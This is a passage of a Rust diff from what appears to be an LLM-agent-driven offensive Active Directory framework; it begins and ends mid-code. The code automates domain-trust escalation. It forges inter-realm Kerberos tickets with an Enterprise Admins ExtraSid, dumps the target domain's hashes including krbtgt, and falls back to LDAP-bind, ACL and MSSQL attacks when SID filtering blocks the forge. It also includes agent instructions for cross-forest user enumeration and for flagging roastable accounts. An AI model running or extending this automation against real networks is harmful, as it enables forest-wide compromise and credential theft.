&& htype.eq_ignore_ascii_case("ntlm") + }) + }) + .unwrap_or(false); + let tail_for_log: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::() + .chars() + .rev() + .collect(); + if has_parent_krbtgt { + info!( + parent_domain = %parent_domain_bg, + "raise_child compromised parent — marking exploited" + ); + let _ = dispatcher_bg + .state + .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg) + .await; + let techniques = + vec!["T1134.005".to_string(), "T1003.006".to_string()]; + let event_id = format!( + "evt-raise-child-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "trust_automation", + "description": format!( + "Child-to-parent ExtraSid escalation: {} \u{2192} {} via raiseChild", + child_domain_bg, parent_domain_bg + ), + "mitre_techniques": techniques, + }); + let _ = dispatcher_bg + .state + .persist_timeline_event( + &dispatcher_bg.queue, + &event, + &techniques, + ) + .await; + } else { + warn!( + parent_domain = %parent_domain_bg, + output_tail = %tail_for_log, + "raise_child completed but no parent krbtgt observed — NOT marking exploited" + ); + } + } + Err(e) => { + warn!( + err = %e, + child_domain = %child_domain_bg, + parent_domain = %parent_domain_bg, + "raise_child dispatch errored" + ); + } + } + }); } } } @@ -557,11 +1227,10 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: } // Follow trust keys (inter-realm ticket + foreign secretsdump) - let (work, admin_cred_phase3, admin_hash_phase3): ( - Vec, - Option, - Option, - ) = { + // + // The deterministic forge uses only the trust key + SIDs (already on + // each TrustFollowWork item); admin creds are no longer needed here. + let work: Vec = { let state = dispatcher.state.read().await; // Skip if no domain admin yet — trust extraction requires DA-level creds @@ -578,29 +1247,6 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .map(|t| (t.flat_name.to_uppercase(), t)) .collect(); - let admin_cred = state - .credentials - .iter() - .find(|c| c.is_admin && !c.password.is_empty()) - .cloned(); - // Find admin hash from any dominated domain with a DC - let admin_hash = if admin_cred.is_none() { - state - .domain_controllers - .keys() - .filter(|d| state.dominated_domains.contains(&d.to_lowercase())) - .find_map(|dom| { - state.hashes.iter().find(|h| { - h.username.to_lowercase() == "administrator" - && h.domain.to_lowercase() == dom.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - }) - }) - .cloned() - } else { - None - }; - let items = state .hashes .iter() @@ -609,9 +1255,7 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: return None; } - // Only process hashes that match a known trust account let netbios = hash.username.trim_end_matches('$').to_uppercase(); - let trust = trust_by_flat.get(&netbios)?; // Resolve source domain — fall back to first dominated domain // with a DC when secretsdump output lacks domain prefix @@ -628,24 +1272,44 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: if source_domain.is_empty() { return None; } + let source_lower = source_domain.to_lowercase(); + + // Resolve target FQDN: prefer explicit TrustInfo from LDAP + // enumeration, else derive from known domains where the + // NetBIOS label matches and the FQDN is not the source + // (filters out same-domain machine accounts). + let target_domain = if let Some(t) = trust_by_flat.get(&netbios) { + t.domain.clone() + } else { + state + .domain_controllers + .keys() + .chain(state.dominated_domains.iter()) + .find(|d| { + let dl = d.to_lowercase(); + dl != source_lower + && d.split('.') + .next() + .map(|label| label.to_uppercase() == netbios) + .unwrap_or(false) + }) + .cloned()? + }; let dedup_key = format!( "trust_follow:{}:{}", - source_domain.to_lowercase(), + source_lower, hash.username.to_lowercase() ); if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) { return None; } - // Use the FQDN from the trust relationship — never fall back - // to bare NetBIOS name which produces invalid domain strings. - let target_domain = trust.domain.clone(); - - let target_dc_ip = state - .domain_controllers - .get(&target_domain.to_lowercase()) - .cloned(); + // Use resolve_dc_ip so we fall back to the hosts table when + // domain_controllers lacks an explicit entry for the foreign + // domain — common for cross-forest trusts where the foreign + // DC is only known via host scan, not LDAP enumeration. + let target_dc_ip = state.resolve_dc_ip(&target_domain); let source_domain_sid = state .domain_sids @@ -656,11 +1320,6 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .get(&target_domain.to_lowercase()) .cloned(); - let source_dc_ip = state - .domain_controllers - .get(&source_domain.to_lowercase()) - .cloned(); - Some(TrustFollowWork { dedup_key, hash: hash.clone(), @@ -669,20 +1328,34 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: target_dc_ip, source_domain_sid, target_domain_sid, - source_dc_ip, }) }) .collect(); - (items, admin_cred, admin_hash) + items }; for item in work { let vuln_id = forest_trust_vuln_id(&item.source_domain, &item.target_domain); - let trust_target = item - .target_dc_ip - .clone() - .unwrap_or_else(|| item.target_domain.clone()); + + // Defer dispatch when the target DC IP is unknown: impacket needs + // a routable -target-ip for both create_inter_realm_ticket and the + // forge-and-present secretsdump fallback. Passing the bare domain + // string fails fast and burns the dedup key. Re-tick in 30s and + // let host scans / trust enum populate the DC entry first. + let target_dc_ip = match item.target_dc_ip.clone() { + Some(ip) => ip, + None => { + debug!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + "Deferring forest trust escalation — target DC IP unresolved" + ); + continue; + } + }; + let trust_target = target_dc_ip.clone(); { let mut details = std::collections::HashMap::new(); details.insert( @@ -720,77 +1393,417 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .await; } - // 1. Dispatch inter-realm ticket creation. - // Use field names that match the tool and prompt expectations: - // - `vuln_type` routes to generate_trust_key_prompt - // - `source_sid`/`target_sid` match create_inter_realm_ticket tool - // - `trusted_domain` is read by the trust prompt - // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing - let mut ticket_payload = json!({ - "technique": "create_inter_realm_ticket", - "vuln_type": "cross_forest", - "domain": item.source_domain, - "trusted_domain": item.target_domain, - "target_domain": item.target_domain, - "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain), - "trust_key": item.hash.hash_value, - "trust_account": item.hash.username, - "vuln_id": &vuln_id, - }); - if let Some(ref sid) = item.source_domain_sid { - ticket_payload["source_sid"] = json!(sid); - } - if let Some(ref sid) = item.target_domain_sid { - ticket_payload["target_sid"] = json!(sid); - } - if let Some(ref aes) = item.hash.aes_key { - ticket_payload["aes_key"] = json!(aes); - } - if let Some(ref dc_ip) = item.source_dc_ip { - ticket_payload["dc_ip"] = json!(dc_ip); - } - if let Some(ref cred) = admin_cred_phase3 { - ticket_payload["username"] = json!(cred.username); - ticket_payload["password"] = json!(cred.password); - } else if let Some(ref hash) = admin_hash_phase3 { - ticket_payload["username"] = json!(hash.username); - ticket_payload["admin_hash"] = json!(hash.hash_value); + // Skip self-referential trust (source == target) + if item.source_domain.to_lowercase() == item.target_domain.to_lowercase() { + debug!( + source = %item.source_domain, + target = %item.target_domain, + "Skipping self-referential trust escalation" + ); + continue; } - match dispatcher - .throttled_submit("exploit", "privesc", ticket_payload, 1) - .await + // Suppress the ExtraSid forge when the trust has SID filtering + // active. ticketer adds Enterprise Admins (RID 519) via + // `--extra-sid` to satisfy DCSync — but a SID-filtered forest + // trust strips RID<1000 SIDs from the cross-realm PAC, and the + // target KDC returns rpc_s_access_denied. Burn the dedup so this + // doomed dispatch can't loop, mark the vuln exploited as a + // strategic choice, and wake the cross-forest fallback paths + // (ACL/MSSQL/FSP) to take over. { - Ok(Some(task_id)) => { + let state = dispatcher.state.read().await; + if is_filtered_inter_forest_trust(&state, &item.source_domain, &item.target_domain) + { info!( - task_id = %task_id, + source = %item.source_domain, + target = %item.target_domain, trust_account = %item.hash.username, - source_domain = %item.source_domain, - target_domain = %item.target_domain, - has_source_sid = item.source_domain_sid.is_some(), - has_target_sid = item.target_domain_sid.is_some(), - "Inter-realm ticket task dispatched" + "Suppressing forge_inter_realm_and_dump — SID filtering on cross-forest trust would reject ExtraSid; waking fallbacks" ); + drop(state); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone()); let _ = dispatcher .state - .mark_exploited(&dispatcher.queue, &vuln_id) + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) .await; - } - Ok(None) => { - debug!("Inter-realm ticket deferred by throttler"); + wake_cross_forest_fallbacks(&dispatcher, &item.target_domain).await; + + // Dispatch `create_inter_realm_ticket` so downstream Kerberos-capable + // tools (e.g. bloodyad with -k) have a valid ccache for the target + // forest. SID filtering blocks ExtraSid-based DCSync, but the forged + // TGT still allows Kerberos LDAP bind as Administrator. The tool writes + // Administrator.ccache in a tempdir; we persist the full path to Redis + // via `publish_kerberos_ticket` so the credential resolver can find it. + { + let dispatcher_bg = dispatcher.clone(); + let source_domain_bg = item.source_domain.clone(); + let target_domain_bg = item.target_domain.clone(); + let trust_key_bg = item.hash.hash_value.clone(); + let aes_key_bg = item.hash.aes_key.clone(); + let source_domain_sid_bg = { + let s = dispatcher.state.read().await; + s.domain_sids + .get(&item.source_domain.to_lowercase()) + .cloned() + }; + tokio::spawn(async move { + dispatch_create_inter_realm_ticket( + &dispatcher_bg, + &source_domain_bg, + &target_domain_bg, + &trust_key_bg, + aes_key_bg.as_deref(), + source_domain_sid_bg.as_deref(), + ) + .await; + }); + } continue; } - Err(e) => { - warn!(err = %e, "Failed to dispatch inter-realm ticket"); - continue; + } + + // Forge-and-present the inter-realm TGT as a deterministic worker + // task — NOT an LLM task. Both `create_inter_realm_ticket` and + // `secretsdump_kerberos` run sequentially on the same worker via + // `expand_technique_task`, so the ccache file produced by ticketer + // is on the same filesystem when secretsdump reads it. + // + // Routing through the LLM here would launder deterministic values + // (NT hash, AES key, SIDs) through token generation — the LLM + // would have to copy them out of the rendered prompt into tool + // call args, where they get dropped, typo'd, or omitted. The + // orchestrator already owns every input; deliver them directly. + // + // Resolve the target DC hostname so Kerberos auth can match the + // SPN baked into the ticket. Falls back to the IP, which works + // when the worker can reverse-resolve via DNS. + let target_dc_hostname = { + let s = dispatcher.state.read().await; + s.hosts + .iter() + .find(|h| h.ip == target_dc_ip && !h.hostname.is_empty()) + .map(|h| h.hostname.clone()) + .or_else(|| { + s.hosts + .iter() + .find(|h| { + (h.is_dc || h.detect_dc()) + && h.hostname.to_lowercase().ends_with(&format!( + ".{}", + item.target_domain.to_lowercase() + )) + }) + .map(|h| h.hostname.clone()) + }) + .unwrap_or_else(|| target_dc_ip.clone()) + }; + + // ticketer writes .ccache in the worker cwd; the + // following secretsdump_kerberos call reads it via KRB5CCNAME. + let ticket_username = "Administrator"; + let ticket_path = format!("{ticket_username}.ccache"); + + // Resolve missing source SID via lookupsid against the source + // DC. ticketer.py needs `--domain-sid` for the source realm to + // build a valid PAC; without it the resulting ticket gets + // rejected by the target KDC. We have DA on the source domain + // (cross-forest forge only fires after DA), so SAMR lookupsid + // works with either a password cred or admin NTLM hash. + let source_domain_sid = if item.source_domain_sid.is_some() { + item.source_domain_sid.clone() + } else { + let (source_dc_ip, src_cred, src_hash) = { + let s = dispatcher.state.read().await; + let src_lower = item.source_domain.to_lowercase(); + let dc = s.resolve_dc_ip(&item.source_domain); + let cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == src_lower + }) + .cloned(); + let h = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == src_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + (dc, cred, h) + }; + let resolved = if let Some(ref dc_ip) = source_dc_ip { + super::golden_ticket::resolve_domain_sid( + &item.source_domain, + dc_ip, + src_cred.as_ref(), + src_hash.as_ref(), + ) + .await + } else { + None + }; + if let Some((sid, admin_name)) = resolved { + info!( + source_domain = %item.source_domain, + sid = %sid, + "Resolved source domain SID for cross-forest forge" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let src_lower = item.source_domain.to_lowercase(); + let _ = reader.set_domain_sid(&mut conn, &src_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &src_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(src_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(src_lower, name.clone()); + } + } + Some(sid) + } else { + warn!( + source = %item.source_domain, + target = %item.target_domain, + "Could not resolve source SID — deferring cross-forest forge" + ); + None } + }; + if source_domain_sid.is_none() { + continue; } - // The privesc agent handles the full flow: forge inter-realm ticket → - // secretsdump_kerberos against the target DC. No separate credential_access - // dispatch needed (it lacked valid auth and always failed). + // For child→parent forges we MUST inject the parent's Enterprise + // Admins SID (RID 519) as ExtraSid; without it the parent KDC + // issues a TGS but DRSUAPI on the parent DC rejects the + // replication call as `rpc_s_access_denied` and nxc dumps zero + // hashes (exit 0, hiding the failure). + // + // For cross-forest forges, the target domain SID is required for + // ticketer.py to build a PAC the target KDC will accept (without + // it the inter-realm TGT is rejected and forge_inter_realm_and_dump + // returns 0 hashes, locking dedup permanently). Resolve the target + // SID on-demand via lookupsid against the target DC using source + // admin creds (cross-trust SAMR works post-DA) when it isn't + // cached. Defer dispatch (no dedup mark) when resolution fails so + // the next 30s tick can retry once sid_enumeration populates it + // via lsaquery. + let source_l = item.source_domain.to_lowercase(); + let target_l = item.target_domain.to_lowercase(); + let is_child_to_parent = + source_l != target_l && source_l.ends_with(&format!(".{target_l}")); + let needs_target_sid = source_l != target_l; + let target_domain_sid: Option = + if !needs_target_sid || item.target_domain_sid.is_some() { + item.target_domain_sid.clone() + } else { + let (src_cred, src_hash) = { + let s = dispatcher.state.read().await; + let src_lower = item.source_domain.to_lowercase(); + let cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == src_lower + }) + .cloned(); + let h = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == src_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + (cred, h) + }; + let resolved = super::golden_ticket::resolve_domain_sid( + &item.target_domain, + &target_dc_ip, + src_cred.as_ref(), + src_hash.as_ref(), + ) + .await; + if let Some((sid, admin_name)) = resolved { + let label = if is_child_to_parent { + "Resolved parent domain SID for child→parent forge ExtraSid" + } else { + "Resolved target domain SID for cross-forest forge" + }; + info!( + target_domain = %item.target_domain, + sid = %sid, + "{}", label + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let tgt_lower = item.target_domain.to_lowercase(); + let _ = reader.set_domain_sid(&mut conn, &tgt_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &tgt_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(tgt_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(tgt_lower, name.clone()); + } + } + Some(sid) + } else { + let label = if is_child_to_parent { + "Could not resolve parent SID — deferring child→parent forge" + } else { + "Could not resolve target SID — deferring cross-forest forge" + }; + warn!( + source = %item.source_domain, + target = %item.target_domain, + target_dc_ip = %target_dc_ip, + "{}", label + ); + None + } + }; + if needs_target_sid && target_domain_sid.is_none() { + continue; + } - // Mark as processed + // Wait for AES256 to upsert before dispatching cross-forest forge. + // secretsdump runs twice (NTLM-only first, then -aes-types) and the + // second call typically lands ~60-90s after NTLM. If we dispatch + // before AES arrives, Win2016+ targets reject the RC4-only ticket + // with KDC_ERR_TGT_REVOKED and forge_inter_realm yields zero hashes + // — locking dedup on a doomed dispatch. + // + // Re-read state.hashes for an AES-equipped variant of this trust + // account; if present, use it. If absent, defer up to ~3 min so the + // second secretsdump can land. After that, dispatch with NTLM-only + // as a last resort (some target DCs accept RC4 still, and the + // wake_cross_forest_fallbacks path is the real safety net). + let resolved_aes_key: Option = if needs_target_sid { + let from_state = { + let s = dispatcher.state.read().await; + s.hashes + .iter() + .find(|h| { + h.username.eq_ignore_ascii_case(&item.hash.username) + && h.domain.eq_ignore_ascii_case(&item.hash.domain) + && h.aes_key.is_some() + }) + .and_then(|h| h.aes_key.clone()) + }; + let aes = item.hash.aes_key.clone().or(from_state); + if aes.is_none() { + let attempts = { + let mut state = dispatcher.state.write().await; + let count = state + .forge_aes_defers + .entry(item.dedup_key.clone()) + .or_insert(0); + *count += 1; + *count + }; + const MAX_AES_DEFERS: u32 = 6; + if attempts <= MAX_AES_DEFERS { + debug!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + attempts, + "Deferring cross-forest forge — AES256 not yet upserted on trust hash" + ); + continue; + } + warn!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + "Dispatching cross-forest forge with NTLM-only after AES wait exhausted" + ); + None + } else { + aes + } + } else { + item.hash.aes_key.clone() + }; + + // Build args for the combined `forge_inter_realm_and_dump` tool. + // This single tool runs impacket-ticketer + impacket-secretsdump + // sequentially in one worker invocation (shared tempdir as cwd), + // so the .ccache produced by ticketer is on the same filesystem + // when secretsdump reads it. Two split dispatch_tool calls would + // land on different worker pods with no shared FS. + let mut tool_args = json!({ + "source_domain": &item.source_domain, + "target_domain": &item.target_domain, + "trust_key": &item.hash.hash_value, + "username": ticket_username, + // `target` is the DC hostname (or IP fallback) for the SPN + // baked into the ticket; `dc_ip` is the routable IP used + // for impacket-secretsdump's `-dc-ip`. + "target": &target_dc_hostname, + "dc_ip": &target_dc_ip, + }); + if let Some(ref sid) = source_domain_sid { + tool_args["source_sid"] = json!(sid); + } + if let Some(ref sid) = target_domain_sid { + tool_args["target_sid"] = json!(sid); + } + // AES256 trust key — required for Win2016+ target DCs which + // reject RC4-only inter-realm tickets with KDC_ERR_TGT_REVOKED. + // resolved_aes_key prefers item.hash.aes_key, then re-reads + // state.hashes for an AES-equipped variant (handles the race + // where secretsdump's second pass upserts AES after work was + // collected). + if let Some(ref aes) = resolved_aes_key { + tool_args["aes_key"] = json!(aes); + } + // For child→parent trusts (intra-forest), inject parent's + // Enterprise Admins SID (RID 519). SID filtering blocks + // ExtraSID across forest trusts, so only emit on intra-forest. + // The defer above guarantees target_domain_sid is Some here + // when is_child_to_parent. + if is_child_to_parent { + if let Some(ref tsid) = target_domain_sid { + tool_args["extra_sid"] = json!(format!("{tsid}-519")); + } + } + let _ = ticket_path; // ccache path is internal to the tool + let _ = trust_target; + + let call = ToolCall { + id: format!("forge_inter_realm_{}", uuid::Uuid::new_v4().simple()), + name: "forge_inter_realm_and_dump".to_string(), + arguments: tool_args, + }; + let task_id = format!( + "trust_forge_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + // Mark dedup BEFORE spawning so the next 30s tick doesn't + // re-dispatch the same trust while the forge is running. dispatcher .state .write() @@ -800,6 +1813,211 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .state .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) .await; + + info!( + task_id = %task_id, + trust_account = %item.hash.username, + source_domain = %item.source_domain, + target_domain = %item.target_domain, + has_source_sid = source_domain_sid.is_some(), + has_target_sid = target_domain_sid.is_some(), + has_aes = resolved_aes_key.is_some(), + "Cross-forest forge dispatched (direct tool, no LLM)" + ); + + let dispatcher_bg = dispatcher.clone(); + let source_domain_bg = item.source_domain.clone(); + let target_domain_bg = item.target_domain.clone(); + let trust_account_bg = item.hash.username.clone(); + let vuln_id_bg = vuln_id.clone(); + let dedup_key_bg = item.dedup_key.clone(); + let trust_key_bg = item.hash.hash_value.clone(); + let aes_key_bg = resolved_aes_key.clone(); + let source_domain_sid_bg = source_domain_sid.clone(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("privesc", &task_id, &call) + .await; + // Clear dedup on failure so the next 30s tick can retry once + // a fresh trust key, AES key, or SID becomes available. + let clear_dedup = || async { + dispatcher_bg + .state + .write() + .await + .unmark_processed(DEDUP_TRUST_FOLLOW, &dedup_key_bg); + let _ = dispatcher_bg + .state + .unpersist_dedup(&dispatcher_bg.queue, DEDUP_TRUST_FOLLOW, &dedup_key_bg) + .await; + }; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + let tail: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::() + .chars() + .rev() + .collect(); + warn!( + err = %err, + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + trust_account = %trust_account_bg, + output_tail = %tail, + "forge_inter_realm_and_dump returned error — clearing dedup for retry" + ); + clear_dedup().await; + return; + } + // Verify target compromise — only mark exploited + // when we actually observe the target krbtgt hash + // in the dispatch_tool discoveries. + let target_lower = target_domain_bg.to_lowercase(); + let has_target_krbtgt = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("hashes")) + .and_then(|h| h.as_array()) + .map(|hashes| { + hashes.iter().any(|h| { + let user = + h.get("username").and_then(|v| v.as_str()).unwrap_or(""); + let dom = + h.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let htype = + h.get("hash_type").and_then(|v| v.as_str()).unwrap_or(""); + user.eq_ignore_ascii_case("krbtgt") + && dom.to_lowercase() == target_lower + && htype.eq_ignore_ascii_case("ntlm") + }) + }) + .unwrap_or(false); + if has_target_krbtgt { + info!( + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + "Cross-forest forge compromised target — marking exploited" + ); + let _ = dispatcher_bg + .state + .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg) + .await; + let techniques = vec!["T1134.005".to_string(), "T1550.003".to_string()]; + let event_id = format!( + "evt-trust-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "trust_automation", + "description": format!( + "Forest trust escalation: {} \u{2192} {} via trust key {}", + source_domain_bg, target_domain_bg, trust_account_bg + ), + "mitre_techniques": techniques, + }); + let _ = dispatcher_bg + .state + .persist_timeline_event(&dispatcher_bg.queue, &event, &techniques) + .await; + } else { + // Tool ran cleanly but no target krbtgt landed in + // discoveries — this is a deterministic failure + // (SID filtering, denied permissions, or wrong + // forest) that won't change on the next 30s tick. + // Keep dedup MARKED so we don't relitigate the + // doomed forge in a tight loop, mark the trust + // vuln exploited so the operation moves on, and + // wake the cross-forest fallback paths + // (ACL/MSSQL/FSP) which can still compromise the + // target forest without ExtraSid. + // + // Surface tool stdout tail + a hash-count summary so + // post-mortem can distinguish silent nxc failure + // (empty output) from auth-denied (nxc printed + // STATUS_LOGON_FAILURE / rpc_s_access_denied) from + // partial dumps (got hashes but no krbtgt — usually + // a cross-forest no-ExtraSid case where the target + // KDC issued a TGS but DRSUAPI rejected replication). + let tail: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::() + .chars() + .rev() + .collect(); + let hash_count = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("hashes")) + .and_then(|h| h.as_array()) + .map(|a| a.len()) + .unwrap_or(0); + warn!( + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + hash_count, + output_tail = %tail, + "forge_inter_realm_and_dump completed but no target krbtgt observed — locking dedup, waking fallbacks (vuln NOT marked exploited; only target krbtgt capture proves compromise)" + ); + let _ = vuln_id_bg; // intentionally unused — see comment above + + // Dump-phase failure (SID filtering missed by + // is_filtered_inter_forest_trust, DRSUAPI denial + // despite a valid TGS, or any other reason DCSync + // returned 0 hashes) leaves the foreign forest + // attackable via Kerberos LDAP bind. Dispatch + // create_inter_realm_ticket so downstream tools + // (bloodyad -k, etc.) get a usable ccache. Without + // this, wake_cross_forest_fallbacks below is a + // no-op when no same-realm credential bound the + // ACL/foreign-group/cross-forest enums to the + // target — the case that left fabrikam.local + // permanently un-attackable in op-20260502-013857. + { + let dispatcher_fb = dispatcher_bg.clone(); + let source_domain_fb = source_domain_bg.clone(); + let target_domain_fb = target_domain_bg.clone(); + let trust_key_fb = trust_key_bg.clone(); + let aes_key_fb = aes_key_bg.clone(); + let source_domain_sid_fb = source_domain_sid_bg.clone(); + tokio::spawn(async move { + dispatch_create_inter_realm_ticket( + &dispatcher_fb, + &source_domain_fb, + &target_domain_fb, + &trust_key_fb, + aes_key_fb.as_deref(), + source_domain_sid_fb.as_deref(), + ) + .await; + }); + } + + wake_cross_forest_fallbacks(&dispatcher_bg, &target_domain_bg).await; + } + } + Err(e) => { + warn!( + err = %e, + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + "forge_inter_realm_and_dump dispatch errored — clearing dedup for retry" + ); + clear_dedup().await; + } + } + }); } } } @@ -812,7 +2030,311 @@ struct TrustFollowWork { target_dc_ip: Option, source_domain_sid: Option, target_domain_sid: Option, - source_dc_ip: Option, +} + +/// Submit a cross-forest user-enumeration recon task immediately after a +/// successful inter-realm ticket forge. +/// +/// Without this, `auto_cross_forest_enum` would refuse to dispatch (its +/// `best_cred` returns None when the target forest has no credentials in +/// state) and the freshly-forged ticket would sit idle. This helper queues +/// the same `ldap_user_enumeration` recon payload using any usable +/// source-domain credential as a placeholder; the credential resolver +/// detects the cross-forest LDAP tool, finds no NTLM hash for the target, +/// and injects the inter-realm ccache via `resolve_cross_forest_ticket`. +async fn dispatch_post_ticket_user_enumeration( + dispatcher: &Dispatcher, + source_domain: &str, + target_domain: &str, +) { + let target_lower = target_domain.to_lowercase(); + + let (target_dc_ip, target_dc_fqdn, source_cred) = { + let s = dispatcher.state.read().await; + let Some(dc_ip) = s.resolve_dc_ip(target_domain) else { + warn!( + source_domain, + target_domain, "post-ticket user-enum skipped: no DC IP for target domain" + ); + return; + }; + let dc_fqdn = s + .hosts + .iter() + .find(|h| h.ip == dc_ip && !h.hostname.is_empty()) + .map(|h| { + let hn = h.hostname.to_lowercase(); + if hn.ends_with(&format!(".{target_lower}")) || hn == target_lower { + hn + } else { + format!("{hn}.{target_lower}") + } + }); + // Pick any non-empty-password credential from the source forest. The + // resolver will swap the cred for the ticket; what matters is that + // bind_domain ends up != target_domain so the cross-forest path is + // taken. We accept child-domain creds (e.g. child.contoso.local + // when source is contoso.local) because intermediate ops often + // only own the child realm — the trust key extraction still uses the + // parent's outbound trust, but state.credentials only holds the + // identities we cracked along the way. + let cred = s + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && is_domain_related(&c.domain, source_domain) + && !s.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + (dc_ip, dc_fqdn, cred) + }; + + let Some(cred) = source_cred else { + warn!( + source_domain, + target_domain, + "post-ticket user-enum skipped: no source-domain credential to seed the task" + ); + return; + }; + + let target = target_dc_fqdn.unwrap_or_else(|| target_dc_ip.clone()); + + let payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": target, + "domain": target_domain, + "bind_domain": source_domain, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": [ + "sAMAccountName", "description", "memberOf", + "userAccountControl", "servicePrincipalName", + "msDS-AllowedToDelegateTo", "adminCount" + ], + "cross_forest": true, + "instructions": concat!( + "Cross-forest user enumeration after inter-realm Kerberos ticket forge. ", + "An inter-realm ccache for this target domain has been pre-cached and ", + "will be auto-injected by the credential resolver. Use ", + "`ldap_search_descriptions` (or `ldap_search`) against the target DC ", + "FQDN — these tools perform GSSAPI bind with the injected ticket. Do ", + "NOT use the supplied password credential for the bind (it is from a ", + "different forest and will be rejected); the ticket handles auth.\n\n", + "Report every user found with EXACTLY this JSON format in ", + "discovered_users:\n", + " {\"username\": \"samaccountname\", \"domain\": \"target.domain\", ", + "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\"]}\n", + "Flag DoesNotRequirePreAuth as vuln_type='asrep_roastable' and SPNs as ", + "vuln_type='kerberoastable'." + ), + }); + + let priority = dispatcher.effective_priority("cross_forest_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + source_domain, + target_domain, + target_dc = %target, + "Post-ticket cross-forest user enumeration dispatched" + ); + } + Ok(None) => { + debug!( + source_domain, + target_domain, "Post-ticket user-enum deferred by throttling" + ); + } + Err(e) => { + warn!( + err = %e, + source_domain, + target_domain, + "Failed to submit post-ticket user-enum task" + ); + } + } +} + +/// Forge an inter-realm Kerberos ticket for a SID-filtered cross-forest trust. +/// +/// Called from the suppression branch of `auto_trust_follow` when +/// `is_filtered_inter_forest_trust` is true. The ExtraSid DCSync path is +/// blocked by SID filtering, but a plain inter-realm TGT is still useful: +/// bloodyad with `-k` can perform Kerberos LDAP bind against the target DC +/// as Administrator, enabling password resets and group membership changes. +/// +/// The ticket is written to `/tmp/ares-tickets/____.ccache` +/// (a shared path accessible to all workers on the same host) and persisted +/// to Redis via `publish_kerberos_ticket` so the credential resolver can +/// find it when bloodyad or other LDAP-bind tools target the foreign forest. +/// +/// SID resolution is opportunistic: if the source SID isn't in state yet, we +/// pass an empty string and ticketer will still produce a ticket (though some +/// KDCs reject it). This is best-effort — the fallback paths (ACL/MSSQL) are +/// the primary attack vectors; this ticket is just a bonus. +async fn dispatch_create_inter_realm_ticket( + dispatcher: &Dispatcher, + source_domain: &str, + target_domain: &str, + trust_key: &str, + aes_key: Option<&str>, + source_domain_sid: Option<&str>, +) { + use ares_llm::ToolCall; + + let ticket_username = "Administrator"; + + // Build tool args. source_sid is required by the tool — use a fallback + // empty string and let ticketer attempt the forge; worst case the KDC + // rejects it and the ticket write fails silently. + let source_sid = source_domain_sid.unwrap_or(""); + if source_sid.is_empty() { + tracing::info!( + source_domain, + target_domain, + "dispatch_create_inter_realm_ticket: source SID 